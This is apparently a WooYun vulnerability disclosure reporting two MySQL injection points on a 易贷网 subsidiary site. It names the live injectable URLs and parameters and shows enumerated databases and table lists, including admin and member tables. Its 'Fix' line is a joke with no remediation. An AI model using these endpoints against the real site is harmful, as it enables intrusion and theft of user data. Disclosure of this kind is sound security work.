
Two MySQL injection vulnerabilities on an 易贷网 subsidiary site

2015-09-08 09:35

The classid parameter is injectable:

http://yimin.edai.com/news.php?classid=3

The country parameter is injectable:

http://yimin.edai.com/immigrate.php?act=home&country=27

Enumerating the databases:

available databases [2]:
[*] information_schema
[*] s582798db0

There are not many databases, but the tables contain information.

Proof of vulnerability:

Database: s582798db0
[26 tables]
+---------------------------------------+
| 3eee_abroad |
| 3eee_admin |
| 3eee_immigrate |
| 3eee_join |
| 3eee_link_class |
| 3eee_link |
| 3eee_member |
| 3eee_message |
| 3eee_news_class |
| 3eee_news_pic |
| 3eee_news |
| 3eee_onepage |
| 3eee_order |
| 3eee_qq_class |
| 3eee_qq |
| 3eee_set |
| mb_admin |
| mb_config |
| mb_float |
| mb_guestbook |
| mb_link |
| mb_linksort |
| mb_member |
| mb_news |
| mb_newssort |
| mb_onepage |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

Fix:

Look at pretty girls

Source: www.wooyun.org/bugs/wooyun-2015-0138673
